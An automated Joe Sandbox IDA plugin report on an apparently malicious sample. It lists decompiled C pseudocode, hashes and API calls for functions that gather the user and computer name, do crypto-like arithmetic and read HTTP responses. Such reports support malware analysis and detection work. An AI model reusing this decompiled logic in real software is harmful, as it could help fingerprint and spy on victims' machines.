Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 762c9e5487778da041d7f8205eabee0183e5964b52f3c3c88f6bef8631e5f3e4
Instruction ID: e507162a2311bf885d3478cd795585eb36c2cb3dd7090a64739c08815db325a0
Opcode Fuzzy Hash: 762c9e5487778da041d7f8205eabee0183e5964b52f3c3c88f6bef8631e5f3e4
Instruction Fuzzy Hash: 7D51673250020EEFCF229FA4DC55FAA7BBAFB04314F108568FA15D21A1D735D921EB62

Uniqueness

Uniqueness Score: -1.00%

Function 008C3ACA Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C3ACA() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x7491c742
						_v12 = _v12 + _t11;
						_t64 = E008C7A71(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E008C789E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x8c3764
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x008c3ad8
0x008c3adb
0x008c3ade
0x008c3ae4
0x008c3ae9
0x008c3aef
0x008c3af7
0x008c3afa
0x008c3b00
0x008c3b05
0x008c3b0e
0x008c3b12
0x008c3b1f
0x008c3b23
0x008c3b25
0x008c3b29
0x008c3b2c
0x008c3b3c
0x008c3b8f
0x008c3b90
0x008c3b3e
0x008c3b43
0x008c3b44
0x008c3b49
0x008c3b4c
0x008c3b5f
0x00000000
0x008c3b61
0x008c3b64
0x008c3b69
0x008c3b77
0x008c3b7a
0x008c3b80
0x008c3b85
0x00000000
0x008c3b87
0x008c3b87
0x008c3b8a
0x008c3b8a
0x008c3b85
0x008c3b5f
0x008c3b95
0x008c3b96
0x008c3b05
0x008c3b9c

APIs

GetUserNameW.ADVAPI32(00000000,008C3762), ref: 008C3ADE
GetComputerNameW.KERNEL32(00000000,008C3762), ref: 008C3AFA

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

GetUserNameW.ADVAPI32(00000000,008C3762), ref: 008C3B34
GetComputerNameW.KERNEL32(008C3762,7491C740), ref: 008C3B57
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,008C3762,00000000,008C3764,00000000,00000000,?,7491C740,008C3762), ref: 008C3B7A

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: c283738fcc02f7920b20309adac93906bdf437206b2f3e3d87c1f718977e5be4
Instruction ID: df0f0e02a52f5cb0f5f689473079a81ece903427118fd2ac118bd6648482f5c4
Opcode Fuzzy Hash: c283738fcc02f7920b20309adac93906bdf437206b2f3e3d87c1f718977e5be4
Instruction Fuzzy Hash: F421A576900208EFDB11DFE9D989DAEBBB8FE44354B5084AAE501E7240D6309F45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008C2D54 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C2D54(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x8ca30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x8ca2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x8ca2f8 = _t6;
					 *0x8ca304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x8ca2f4 = _t7;
					if(_t7 == 0) {
						 *0x8ca2f4 =  *0x8ca2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x008c2d5c
0x008c2d62
0x008c2d69
0x00000000
0x008c2dc3
0x008c2d6b
0x008c2d73
0x008c2d80
0x008c2d80
0x008c2dc0
0x00000000
0x008c2dc0
0x008c2d82
0x008c2d82
0x008c2d87
0x008c2d99
0x008c2d9e
0x008c2da4
0x008c2daa
0x008c2db1
0x008c2db3
0x008c2db3
0x00000000
0x008c2dba
0x008c2d7c
0x00000000
0x00000000
0x008c2d7e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,008C72F1,?), ref: 008C2D5C
GetVersion.KERNEL32 ref: 008C2D6B
GetCurrentProcessId.KERNEL32 ref: 008C2D87
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 008C2DA4
GetLastError.KERNEL32 ref: 008C2DC3

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 6a13fb9f085527ccfcc0f3d6663ff4fd8e0309defb1eba8eeb5ca67f6f5b6acb
Instruction ID: c73fccefc416b53c29280a797fa9afb81544b274983778db4a7bbb507ed4665c
Opcode Fuzzy Hash: 6a13fb9f085527ccfcc0f3d6663ff4fd8e0309defb1eba8eeb5ca67f6f5b6acb
Instruction Fuzzy Hash: 45F0A93064071BABD728AB30AC2DF643BB1F720785F10045CE693C62E4D670C480CF2A

Uniqueness

Uniqueness Score: -1.00%

Function 008C55F9 Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E008C55F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x8ca348; // 0xa3d5a8
					_t5 = _t103 + 0x8cb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x8c9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x8ca348; // 0xa3d5a8
												_t28 = _t109 + 0x8cb0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x8ca348; // 0xa3d5a8
														_t33 = _t79 + 0x8cb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x008c55fe
0x008c5607
0x008c5608
0x008c560c
0x008c5612
0x008c5618
0x008c5621
0x008c5627
0x008c5631
0x008c5633
0x008c5639
0x008c563e
0x008c5649
0x008c564f
0x008c5654
0x008c5776
0x008c565a
0x008c565a
0x008c5667
0x008c566d
0x008c5673
0x008c5677
0x008c567d
0x008c568a
0x008c568e
0x008c5694
0x008c5697
0x008c569f
0x008c56a0
0x008c56a4
0x008c56a8
0x008c56ab
0x008c56ae
0x008c56b4
0x008c56bd
0x008c56c3
0x008c56c4
0x008c56c7
0x008c56c8
0x008c56c9
0x008c56d1
0x008c56d2
0x008c56d3
0x008c56d5
0x008c56d9
0x008c56dd
0x00000000
0x00000000
0x008c56e3
0x008c56ec
0x008c56f2
0x008c56fc
0x008c5700
0x008c5702
0x008c570f
0x008c5713
0x008c571b
0x008c5720
0x008c5732
0x008c5734
0x008c573a
0x008c573a
0x008c5743
0x008c5743
0x008c5745
0x008c574b
0x008c574b
0x008c574e
0x008c5754
0x008c5757
0x008c5760
0x00000000
0x00000000
0x00000000
0x008c5760
0x008c56b4
0x008c56ae
0x008c5697
0x008c5766
0x008c5766
0x008c576c
0x008c576c
0x008c5772
0x008c5772
0x008c577b
0x008c5781
0x008c5781
0x008c563e
0x008c578a

APIs

SysAllocString.OLEAUT32(008C9284), ref: 008C5649
lstrcmpW.KERNEL32(00000000,0076006F), ref: 008C572A
SysFreeString.OLEAUT32(00000000), ref: 008C5743
SysFreeString.OLEAUT32(?), ref: 008C5772

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: fe6b1e61a262e521861416a9d628ec304deb965bd52f23bfaaf29bc50b3f0966
Instruction ID: e4e9bcddb43cc0bbc588da2f87eb9dd8febe2aa98f92f251caf1726e4c724887
Opcode Fuzzy Hash: fe6b1e61a262e521861416a9d628ec304deb965bd52f23bfaaf29bc50b3f0966
Instruction Fuzzy Hash: EF512E75D00A09EFCF01DFA8C888DAEB7B5FF89705B144598E915EB210D731AD81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C1335 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008C1370
SysFreeString.OLEAUT32(00000000), ref: 008C1455

Part of subcall function 008C55F9: SysAllocString.OLEAUT32(008C9284), ref: 008C5649

SafeArrayDestroy.OLEAUT32(00000000), ref: 008C14A8
SysFreeString.OLEAUT32(00000000), ref: 008C14B7

Part of subcall function 008C43F6: Sleep.KERNEL32(000001F4), ref: 008C443E

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: e92f51e65956e8a970ca21a3905dc3eb55c251d020f035e6f9318665bd3e5d14
Instruction ID: b05a41244da08d151b3f5ce6a365a7a7d517cce9edb3374edddcfe8fa6a5e842
Opcode Fuzzy Hash: e92f51e65956e8a970ca21a3905dc3eb55c251d020f035e6f9318665bd3e5d14
Instruction Fuzzy Hash: 27512075500609AFDB05CFA8C888EAEB7BAFF89700F148469E915EB221DB31DD45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008C19D1 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E008C19D1(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E008C43E5(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E008C17D5(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E008C4376(_t101,  &_v428, _a8, _t96 - _t81);
					E008C4376(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E008C17D5(_t101, 0x8ca1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E008C17D5(_a16, _a4);
						E008C71DF(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L008C82AA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L008C82A4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E008C3506(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E008C5422(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E008C4CD2(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x8ca1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x008c19d4
0x008c19e0
0x008c19e6
0x008c19eb
0x008c19ef
0x008c1b61
0x008c1b65
0x008c1b65
0x008c19f5
0x008c19f9
0x008c19fd
0x008c1a00
0x008c1a0b
0x008c1a11
0x008c1a16
0x008c1a19
0x008c1a33
0x008c1a42
0x008c1a4e
0x008c1a58
0x008c1a5d
0x008c1a5f
0x008c1a62
0x008c1b19
0x008c1b1f
0x008c1b30
0x008c1b43
0x008c1b59
0x00000000
0x008c1b5e
0x008c1a6b
0x008c1a72
0x008c1a76
0x008c1a7c
0x008c1a7e
0x008c1a80
0x008c1a82
0x008c1a84
0x008c1a8e
0x008c1a93
0x008c1a95
0x008c1a97
0x008c1a98
0x008c1a99
0x008c1a9a
0x008c1aa1
0x008c1aa8
0x008c1aab
0x008c1aab
0x008c1a78
0x008c1a78
0x008c1a78
0x008c1ab3
0x008c1abb
0x008c1ac7
0x008c1acc
0x008c1acc
0x008c1ad1
0x00000000
0x00000000
0x008c1ad3
0x008c1ad6
0x008c1ae3
0x00000000
0x00000000
0x008c1ae5
0x008c1ae5
0x008c1af2
0x008c1acc
0x008c1ad1
0x00000000
0x00000000
0x00000000
0x008c1ad1
0x008c1afc
0x008c1aff
0x008c1b02
0x008c1b09
0x008c1b09
0x008c1b16
0x00000000
0x008c1b16
0x008c1a02
0x008c1a06
0x008c1a07
0x008c1a09
0x00000000
0x00000000
0x00000000
0x008c1a09
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 008C1A84
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 008C1A9A
memset.NTDLL ref: 008C1B43
memset.NTDLL ref: 008C1B59

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 37b74f30acafbe46425336c9dbc0ed9b5afd1e5e082efadc2b1d927f5dc309f5
Instruction ID: e75378617d8b251e92bd073701aa6e9dd3d8b6901bcbd848dfdb8b91ea240ccf
Opcode Fuzzy Hash: 37b74f30acafbe46425336c9dbc0ed9b5afd1e5e082efadc2b1d927f5dc309f5
Instruction Fuzzy Hash: B7419F31A01219AFDF109E6CCC89FDE7775FF46310F108569B80AD6282EB70DE548B51

Uniqueness

Uniqueness Score: -1.00%

Function 008C4F4B Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E008C4F4B(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x8ca160() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x8ca174(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E008C7A71(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x8ca160() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E008C2129( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E008C789E(_v16);
										if(_t64 == 0) {
											_t64 = E008C45DF(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E008C2129( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E008C4E4D(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x008c4f4b
0x008c4f4c
0x008c4f52
0x008c4f5d
0x008c4f5d
0x008c4f5f
0x008c7625
0x008c762a
0x008c762c
0x008c7631
0x008c7632
0x008c7637
0x008c7638
0x008c7643
0x008c7674
0x008c7679
0x008c773c
0x008c767f
0x008c7686
0x008c768e
0x008c7739
0x008c7694
0x008c7699
0x008c769e
0x008c76a3
0x008c772b
0x008c76a9
0x008c76a9
0x008c76ab
0x008c76b1
0x008c76b2
0x008c76b2
0x008c76b5
0x008c76b8
0x008c76be
0x008c76c3
0x008c76c4
0x008c76c9
0x008c76cc
0x008c76d7
0x00000000
0x00000000
0x008c76df
0x008c76e7
0x008c76f3
0x008c76f7
0x008c76f9
0x008c76fe
0x00000000
0x00000000
0x008c76fe
0x008c76f7
0x008c7710
0x008c7713
0x008c771a
0x008c7725
0x008c7725
0x00000000
0x008c7700
0x008c7700
0x008c7705
0x008c7707
0x008c7708
0x008c770b
0x00000000
0x008c770b
0x00000000
0x008c7705
0x008c76b2
0x008c772c
0x008c772c
0x008c7732
0x008c7732
0x008c768e
0x008c7645
0x008c764b
0x008c7653
0x008c766c
0x008c766e
0x00000000
0x00000000
0x008c7655
0x008c765f
0x008c7663
0x008c7669
0x00000000
0x008c7669
0x008c7663
0x008c7653
0x008c7745
0x008c4f54
0x008c4f54
0x008c4f5b
0x008c4f66
0x00000000
0x00000000
0x00000000
0x008c4f5b

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,74CF81D0,00000000,00000000), ref: 008C762C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?,?), ref: 008C7645
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?), ref: 008C76BE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?,?), ref: 008C76D9

Part of subcall function 008C4E4D: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 008C4E64
Part of subcall function 008C4E4D: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?), ref: 008C4E74
Part of subcall function 008C4E4D: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 008C4EA6
Part of subcall function 008C4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 008C4ECB
Part of subcall function 008C4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 008C4EEB

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 2176574591-0
Opcode ID: 18d71e732a1aedbe83f2204efd9085358a228e6b094a12d9878852f3469cf7bd
Instruction ID: 4c68ba621574e9e3d886649c72d17ceae43ef81d21e32c533ead0909f87ed61c
Opcode Fuzzy Hash: 18d71e732a1aedbe83f2204efd9085358a228e6b094a12d9878852f3469cf7bd
Instruction Fuzzy Hash: 3641D132604608ABCB229BA8DC44FAEB7B9FF943A4F24456DF516D7190EB30ED419F50

Uniqueness

Uniqueness Score: -1.00%

Function 008C797A Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E008C797A(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x8ca310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x8ca348; // 0xa3d5a8
				_t3 = _t8 + 0x8cb87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E008C6702(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x8ca34c, 1, 0, _t30);
					E008C789E(_t30);
				}
				_t12 =  *0x8ca2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E008C7256() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E008C3BF0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x8ca124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E008C5854(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
